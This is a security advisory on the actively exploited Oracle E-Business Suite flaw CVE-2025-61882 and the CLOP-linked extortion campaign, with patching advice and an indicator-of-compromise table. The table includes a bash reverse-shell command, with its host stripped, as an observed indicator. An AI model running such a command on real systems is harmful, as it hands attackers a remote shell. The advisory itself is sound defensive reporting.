Security advisories

Oracle E-Business Suite Zero-Day Vulnerability (CVE-2025-61882)

October 6, 2025 | 3 MINS READ

Speak With A Security Expert Now

TALK TO AN EXPERT

THE THREAT

On October 4th, 2025 Oracle released a security advisory addressing a critical, zero-day vulnerability impacted its E-Business Suite (EBS), identified during their investigation into the recently disclosed extortion campaign targeting EBS customers. CVE-2025-61882 (CVSS: 9.8) resides within the Oracle Concurrent Processing component's BI Publisher Integration in the EBS. It allows an unauthenticated attacker with network access via HTTP to potentially compromise the Concurrent Processing product. If successfully exploited, this flaw could enable an attacker to gain complete control over the product, thereby facilitating Remote Code Execution (RCE).

Oracle released the advisory following Google Threat Intelligence Group's (GTIG) disclosure about an extortion email campaign likely tied to the CLOP (aka Cl0p, FIN11, TA505) data theft and extortion group. Although the CLOP threat actor group is suspected to be responsible for the campaign, claims have emerged from another group known as the Scattered LAPSUS$ Hunters group. They shared the Proof-of-Concept (PoC) exploit code publicly on Telegram, stating their exploit code was leaked and sold to CLOP.

Given the active exploitation of CVE-2025-61882, involvement of a well-known extortion threat group, and public availability of the PoC exploit code, it is critical that organizations apply the relevant security patches immediately and upgrade to Oracle EBS's latest secure version.

What we're doing about it

What you should do about it

Additional information

Researchers from GTIG identified a "high-volume extortion campaign," observing extortion emails dated around September 29th, 2025. These emails, which were sent to executives from various organizations, alleged that the threat actor had breached their Oracle EBS systems and exfiltrated sensitive data. GTIG uncovered connections between the extortion campaign and the CLOP threat actor group. This group is well-known for conducting extortion campaigns by leveraging compromised email accounts. At least one email address associated with the group was identified from the observed extortion note.

Shortly after GTIG's update, Oracle verified the legitimacy of the extortion campaign, indicating that vulnerabilities from their July patch release had been exploited. However, the specific vulnerabilities involved were not disclosed. On October 4th, 2025, Oracle disclosed that CVE-2025-61882 had been exploited in the extortion campaign and released patches for the vulnerability. The flaw is classified as a low attack complexity vulnerability that does not require any user interaction, meaning it can easily be exploited remotely without the need for authentication. Oracle's advisory also provides a list of IoCs that were observed during the investigation into the extortion campaign.

Google Mandiant's Chief Technology Officer, Charles Carmakal stated that the CLOP group exploited vulnerabilities in Oracle EBS in August 2025. These vulnerabilities include the ones patched in July 2025 as well as CVE-2025-61882. Although no confirmation around exploited vulnerabilities from the July patch release has been provided, among the disclosed vulnerabilities there are three that can be exploited remotely, CVE-2025-30745, CVE-2025-30746, and CVE-2025-50107.

Despite the Scattered LAPSUS$ Hunters group's claims that the CLOP group stole their exploit, there is concern that the two groups might be collaborating to execute a widespread extortion campaign. The Scattered LAPSUS$ Hunters group has indicated their intention to target Oracle EBS with another exploit, which they claim to be a "better chained version that exploits EBS".

As the PoC exploit code for CVE-2025-61882 is publicly available, it is highly likely that other threat actors will target the vulnerable instances in the near future. Given the criticality of CVE-2025-61882, the widespread scope of the extortion campaign, and publicly available PoC exploit code, it is recommended that the organizations patch the flaw and other potentially exploited vulnerabilities to mitigate the risk of exploitation. Organizations that have received the extortion emails are encouraged to investigate potential breaches, report extortion attempts to law enforcement, and avoid paying ransom demands, as payment does not guarantee that threat actors will delete stolen data.

Impacted Versions List:

Indicators of Compromise (IOCs)
Indicator Type
200[.]107[.]207[.]26 IP Address
185[.]181[.]60[.]11 IP Address
76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d SHA 256
aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 SHA 256
6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b SHA 256
sh -c /bin/bash -i >& /dev/tcp// 0>&1 Command

References:

[1] https://www.oracle.com/security-alerts/alert-cve-2025-61882.html
[2] https://nvd.nist.gov/vuln/detail/CVE-2025-61882
[3] https://www.cyber.gc.ca/en/guidance/profile-ta505-cl0p-ransomware
[4] https://www.resecurity.com/blog/article/trinity-of-chaos-the-lapsus-shinyhunters-and-scattered-spider-alliance-embarks-on-global-cybercrime-spree
[5] https://www.linkedin.com/posts/austin-larsen_threatintelligence-cybersecurity-clop-activity-7379316941762727936-h8sR/
[6] https://www.linkedin.com/feed/update/urn:li:activity:7379498157208027136/
[7] https://nvd.nist.gov/vuln/detail/CVE-2025-30745
[8] https://nvd.nist.gov/vuln/detail/CVE-2025-30746
[9] https://nvd.nist.gov/vuln/detail/CVE-2025-50107

View Most Recent Advisories